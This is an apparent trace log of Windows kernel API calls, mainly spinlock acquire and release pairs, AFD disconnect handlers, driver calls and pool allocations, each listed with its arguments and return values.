| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76eb5c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76eb5c |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| AfdDisconnectEventHandler | ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766b64, SpinLock_unk_out = 0xffffe0003a766b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7a45bc, SpinLock_unk_out = 0xffffe0003a7a45bc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7a45bc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7a45bc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| AfdDisconnectEventHandler | ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a786b64, SpinLock_unk_out = 0xffffe0003a786b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a786b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a786b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76e79c, SpinLock_unk_out = 0xffffe0003a76e79c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76e79c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76e79c |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| AfdDisconnectEventHandler | ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c634fe4, SpinLock_unk_out = 0xffffe0003c634fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c634fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003c634fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7866dc, SpinLock_unk_out = 0xffffe0003a7866dc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7866dc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7866dc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| AfdDisconnectEventHandler | ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a786fe4, SpinLock_unk_out = 0xffffe0003a786fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a786fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a786fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76e97c, SpinLock_unk_out = 0xffffe0003a76e97c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76e97c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76e97c |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| AfdDisconnectEventHandler | ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a78773c, SpinLock_unk_out = 0xffffe0003a78773c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a78773c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a78773c |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5ed250 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a78773c, SpinLock_unk_out = 0xffffe0003a78773c, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a78773c, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a78773c |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a78773c, SpinLock_unk_out = 0xffffe0003a78773c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a78773c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a78773c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a78773c, SpinLock_unk_out = 0xffffe0003a78773c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a78773c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a78773c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76f65c, SpinLock_unk_out = 0xffffe0003a76f65c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76f65c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76f65c |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5ed250 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76f65c, SpinLock_unk_out = 0xffffe0003a76f65c, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76f65c, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a76f65c |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76f65c, SpinLock_unk_out = 0xffffe0003a76f65c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76f65c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76f65c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76f65c, SpinLock_unk_out = 0xffffe0003a76f65c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76f65c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76f65c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76f47c, SpinLock_unk_out = 0xffffe0003a76f47c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76f47c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76f47c |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5ed250 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76f47c, SpinLock_unk_out = 0xffffe0003a76f47c, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76f47c, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a76f47c |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76f47c, SpinLock_unk_out = 0xffffe0003a76f47c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76f47c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76f47c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76f47c, SpinLock_unk_out = 0xffffe0003a76f47c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76f47c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76f47c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7a43dc, SpinLock_unk_out = 0xffffe0003a7a43dc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7a43dc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7a43dc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5ed250 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7a43dc, SpinLock_unk_out = 0xffffe0003a7a43dc, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7a43dc, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a7a43dc |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7a43dc, SpinLock_unk_out = 0xffffe0003a7a43dc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7a43dc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7a43dc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7a43dc, SpinLock_unk_out = 0xffffe0003a7a43dc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7a43dc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7a43dc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76eb5c, SpinLock_unk_out = 0xffffe0003a76eb5c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76eb5c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76eb5c |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5ed250 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76eb5c, SpinLock_unk_out = 0xffffe0003a76eb5c, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76eb5c, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a76eb5c |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x81, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a7824c0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76eb5c, SpinLock_unk_out = 0xffffe0003a76eb5c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76eb5c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76eb5c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76eb5c, SpinLock_unk_out = 0xffffe0003a76eb5c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76eb5c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76eb5c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7a45bc, SpinLock_unk_out = 0xffffe0003a7a45bc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7a45bc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7a45bc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5ed250 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7a45bc, SpinLock_unk_out = 0xffffe0003a7a45bc, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7a45bc, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a7a45bc |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x81, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a7873e0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7a45bc, SpinLock_unk_out = 0xffffe0003a7a45bc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7a45bc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7a45bc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7a45bc, SpinLock_unk_out = 0xffffe0003a7a45bc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7a45bc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7a45bc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76e79c, SpinLock_unk_out = 0xffffe0003a76e79c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76e79c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76e79c |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5ed250 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76e79c, SpinLock_unk_out = 0xffffe0003a76e79c, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76e79c, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a76e79c |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
